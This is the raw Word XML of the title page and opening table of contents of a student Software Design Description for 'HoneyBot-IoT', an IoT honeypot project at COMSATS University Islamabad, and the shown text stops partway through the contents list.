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people.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.peop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E3DDCB6" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00634EF6" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc217077053"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="126BC18D" wp14:editId="4AECF332">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-323850</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>9525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1200150" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1" name="Picture 1" descr="Logo, company nam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2" descr="Logo, company name&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1200150" cy="1200150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3648FEEB" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00634EF6" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>COMSATS University Islamabad (CUI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29685E2E" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F1D844" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Software Design Description </w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(SDS DOCUMENT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10025C1B" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3377A7" w14:textId="77777777" w:rsidR="00880A78" w:rsidRDefault="00880A78" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HoneyBot-IoT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45944283" w14:textId="656A4410" w:rsidR="003272AD" w:rsidRPr="00880A78" w:rsidRDefault="00880A78" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>A High-Interaction Multi-Protocol IoT Honeypot for Cyber Threat Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C87919" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00634EF6" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Version 2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDAA84C" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00634EF6" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
        <w:t>By</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B773AE3" w14:textId="20409365" w:rsidR="003272AD" w:rsidRPr="00634EF6" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5655"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Abdul Wadood     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CIIT/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SP23-BCT-001/ISB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781AD0AE" w14:textId="52E05592" w:rsidR="003272AD" w:rsidRPr="00634EF6" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Abdul Rahman      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CIIT/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SP23-BCT-003/ISB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C4A896" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00634EF6" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E844242" w14:textId="28D4491A" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Supervisor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Mrs. Sara Ali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BCDD94" w14:textId="3C3BF94E" w:rsidR="002C2A3E" w:rsidRPr="00634EF6" w:rsidRDefault="002C2A3E" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F5DD267" wp14:editId="05878D14">
            <wp:extent cx="762000" cy="615950"/>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762000" cy="615950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54326982" w14:textId="77777777" w:rsidR="005C6601" w:rsidRPr="00C251B1" w:rsidRDefault="005C6601" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="ChangeHistoryTitle"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660535AF" w14:textId="7062835B" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00C05C1F">
      <w:pPr>
        <w:pStyle w:val="ChangeHistoryTitle"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Bachelor of Science in Cyber Security (2023-2026)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9608D" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ChangeHistoryTitle"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:sectPr w:rsidR="003272AD" w:rsidRPr="00C251B1" w:rsidSect="0069596F">
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="326"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="1" w:name="_Toc346509227" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="1" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="2" w:name="_Toc346508952" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="2" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="3" w:name="_Toc346508722" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="3" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="4" w:name="_Toc344879822" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="4" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="5" w:name="_Toc344877432" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="5" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="941573254"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="1986842C" w14:textId="0951F866" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc119920743" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Revision History</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119920743 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">v</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119920744" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Application Evaluation History</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119920744 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">vi</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229436411" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">1. INTRODUCTION</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229436411 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">7</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69001" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">1.6 Modules Covered in This Document</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69001 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">8</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69002" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">1.7 Progress since the Previous Evaluations (30% → 60% → 70%)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69002 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">10</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69003" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">1.8 Agreed Scope Simplifications</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69003 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">12</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69004" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">1.9 Remaining Work for the 100% Milestone</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69004 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">13</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69005" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Design Methodology and Software Process Model</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69005 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">14</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
